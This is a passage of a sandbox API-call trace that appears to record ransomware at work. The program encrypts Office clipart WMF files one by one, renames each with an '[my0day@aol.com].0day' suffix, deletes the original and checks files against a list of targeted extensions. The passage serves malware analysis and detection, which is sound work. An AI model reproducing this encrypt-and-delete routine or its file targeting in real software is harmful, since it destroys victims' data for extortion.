dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.731] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0274.732] GetLastError () returned 0x0 [0274.732] ReadFile (in: hFile=0x39c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x5a8, lpOverlapped=0x0) returned 1 [0274.733] WriteFile (in: hFile=0x388, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0274.734] ReadFile (in: hFile=0x39c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0274.734] WriteFile (in: hFile=0x388, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.734] SetEndOfFile (hFile=0x388) returned 1 [0274.734] CloseHandle (hObject=0x388) returned 1 [0274.734] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.734] SetEndOfFile (hFile=0x39c) returned 1 [0274.737] CloseHandle (hObject=0x39c) returned 1 [0274.737] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.737] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf")) returned 1 [0274.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0274.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0274.738] lstrlenW (lpString=".doc") returned 4 [0274.738] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.738] lstrlenW (lpString=".docx") returned 5 [0274.738] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.738] lstrlenW (lpString=".pdf") returned 4 [0274.738] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.738] lstrlenW (lpString=".xls") returned 4 [0274.738] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.738] lstrlenW (lpString=".xlsx") returned 5 [0274.738] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.738] lstrlenW (lpString=".ppt") returned 4 [0274.738] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0274.738] lstrlenW (lpString=".zip") returned 4 [0274.738] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.739] lstrlenW (lpString=".rar") returned 4 [0274.739] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.739] lstrlenW (lpString=".bz2") returned 4 [0274.739] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.739] lstrlenW (lpString=".7z") returned 3 [0274.739] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0274.739] lstrlenW (lpString=".dbf") returned 4 [0274.739] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0274.739] lstrlenW (lpString=".1cd") returned 4 [0274.739] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0274.739] lstrlenW (lpString=".jpg") returned 4 [0274.739] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0274.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0274.739] lstrlenW (lpString=".doc") returned 4 [0274.739] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.739] lstrlenW (lpString=".docx") returned 5 [0274.739] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.739] lstrlenW (lpString=".pdf") returned 4 [0274.739] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.739] lstrlenW (lpString=".xls") returned 4 [0274.739] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.739] lstrlenW (lpString=".xlsx") returned 5 [0274.739] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.739] lstrlenW (lpString=".ppt") returned 4 [0274.739] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0274.739] lstrlenW (lpString=".zip") returned 4 [0274.739] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.739] lstrlenW (lpString=".rar") returned 4 [0274.740] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.740] lstrlenW (lpString=".bz2") returned 4 [0274.740] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.740] lstrlenW (lpString=".7z") returned 3 [0274.740] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0274.740] lstrlenW (lpString=".dbf") returned 4 [0274.740] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0274.740] lstrlenW (lpString=".1cd") returned 4 [0274.740] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0274.740] lstrlenW (lpString=".jpg") returned 4 [0274.740] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.740] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.740] lstrlenW (lpString="DD01182_.WMF") returned 12 [0274.740] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0274.740] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=2996) returned 1 [0274.740] CloseHandle (hObject=0x39c) returned 1 [0274.746] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf")) returned 0x20 [0274.746] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0274.747] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.747] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.747] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0274.747] GetLastError () returned 0x0 [0274.747] ReadFile (in: hFile=0x39c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0xbb4, lpOverlapped=0x0) returned 1 [0274.749] WriteFile (in: hFile=0x388, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xbc0, lpOverlapped=0x0) returned 1 [0274.750] ReadFile (in: hFile=0x39c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0274.750] WriteFile (in: hFile=0x388, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.750] SetEndOfFile (hFile=0x388) returned 1 [0274.750] CloseHandle (hObject=0x388) returned 1 [0274.750] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.750] SetEndOfFile (hFile=0x39c) returned 1 [0274.752] CloseHandle (hObject=0x39c) returned 1 [0274.752] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.752] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf")) returned 1 [0274.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0274.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0274.753] lstrlenW (lpString=".doc") returned 4 [0274.753] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.753] lstrlenW (lpString=".docx") returned 5 [0274.753] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.753] lstrlenW (lpString=".pdf") returned 4 [0274.753] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.753] lstrlenW (lpString=".xls") returned 4 [0274.753] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.753] lstrlenW (lpString=".xlsx") returned 5 [0274.753] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.753] lstrlenW (lpString=".ppt") returned 4 [0274.753] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0274.753] lstrlenW (lpString=".zip") returned 4 [0274.753] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.753] lstrlenW (lpString=".rar") returned 4 [0274.753] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.753] lstrlenW (lpString=".bz2") returned 4 [0274.753] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.753] lstrlenW (lpString=".7z") returned 3 [0274.753] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0274.753] lstrlenW (lpString=".dbf") returned 4 [0274.753] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0274.753] lstrlenW (lpString=".1cd") returned 4 [0274.753] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0274.753] lstrlenW (lpString=".jpg") returned 4 [0274.753] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0274.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0274.754] lstrlenW (lpString=".doc") returned 4 [0274.754] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.754] lstrlenW (lpString=".docx") returned 5 [0274.754] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.754] lstrlenW (lpString=".pdf") returned 4 [0274.754] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.754] lstrlenW (lpString=".xls") returned 4 [0274.754] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.754] lstrlenW (lpString=".xlsx") returned 5 [0274.754] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.754] lstrlenW (lpString=".ppt") returned 4 [0274.754] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0274.754] lstrlenW (lpString=".zip") returned 4 [0274.754] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.754] lstrlenW (lpString=".rar") returned 4 [0274.754] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.754] lstrlenW (lpString=".bz2") returned 4 [0274.754] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.754] lstrlenW (lpString=".7z") returned 3 [0274.754] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0274.754] lstrlenW (lpString=".dbf") returned 4 [0274.754] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0274.754] lstrlenW (lpString=".1cd") returned 4 [0274.754] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0274.754] lstrlenW (lpString=".jpg") returned 4 [0274.754] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.755] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.755] lstrlenW (lpString="DD01183_.WMF") returned 12 [0274.755] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0274.757] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=2296) returned 1 [0274.757] CloseHandle (hObject=0x39c) returned 1 [0274.757] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf")) returned 0x20 [0274.757] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.757] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0274.757] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.757] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.757] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0274.758] GetLastError () returned 0x0 [0274.758] ReadFile (in: hFile=0x39c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x8f8, lpOverlapped=0x0) returned 1 [0274.759] WriteFile (in: hFile=0x388, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x900, lpOverlapped=0x0) returned 1 [0274.760] ReadFile (in: hFile=0x39c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0274.760] WriteFile (in: hFile=0x388, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.761] SetEndOfFile (hFile=0x388) returned 1 [0274.761] CloseHandle (hObject=0x388) returned 1 [0274.761] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.761] SetEndOfFile (hFile=0x39c) returned 1 [0274.773] CloseHandle (hObject=0x39c) returned 1 [0274.773] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.773] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf")) returned 1 [0274.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0274.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0274.773] lstrlenW (lpString=".doc") returned 4 [0274.773] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.773] lstrlenW (lpString=".docx") returned 5 [0274.773] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.773] lstrlenW (lpString=".pdf") returned 4 [0274.773] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.773] lstrlenW (lpString=".xls") returned 4 [0274.773] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.774] lstrlenW (lpString=".xlsx") returned 5 [0274.774] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.774] lstrlenW (lpString=".ppt") returned 4 [0274.774] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0274.774] lstrlenW (lpString=".zip") returned 4 [0274.774] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.774] lstrlenW (lpString=".rar") returned 4 [0274.774] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.774] lstrlenW (lpString=".bz2") returned 4 [0274.774] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.774] lstrlenW (lpString=".7z") returned 3 [0274.774] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0274.774] lstrlenW (lpString=".dbf") returned 4 [0274.774] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0274.774] lstrlenW (lpString=".1cd") returned 4 [0274.774] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0274.774] lstrlenW (lpString=".jpg") returned 4 [0274.774] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0274.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0274.774] lstrlenW (lpString=".doc") returned 4 [0274.774] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.774] lstrlenW (lpString=".docx") returned 5 [0274.774] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.774] lstrlenW (lpString=".pdf") returned 4 [0274.774] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.774] lstrlenW (lpString=".xls") returned 4 [0274.774] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.774] lstrlenW (lpString=".xlsx") returned 5 [0274.774] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.775] lstrlenW (lpString=".ppt") returned 4 [0274.775] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0274.775] lstrlenW (lpString=".zip") returned 4 [0274.775] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.775] lstrlenW (lpString=".rar") returned 4 [0274.775] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.775] lstrlenW (lpString=".bz2") returned 4 [0274.775] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.775] lstrlenW (lpString=".7z") returned 3 [0274.775] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0274.775] lstrlenW (lpString=".dbf") returned 4 [0274.775] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0274.775] lstrlenW (lpString=".1cd") returned 4 [0274.775] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0274.775] lstrlenW (lpString=".jpg") returned 4 [0274.775] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.775] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.775] lstrlenW (lpString="DD01186_.WMF") returned 12 [0274.775] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0274.776] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=8564) returned 1 [0274.776] CloseHandle (hObject=0x39c) returned 1 [0274.776] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf")) returned 0x20 [0274.776] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.776] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0274.776] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.776] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.776] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0274.776] GetLastError () returned 0x0 [0274.776] ReadFile (in: hFile=0x39c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x2174, lpOverlapped=0x0) returned 1 [0274.778] WriteFile (in: hFile=0x388, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x2180, 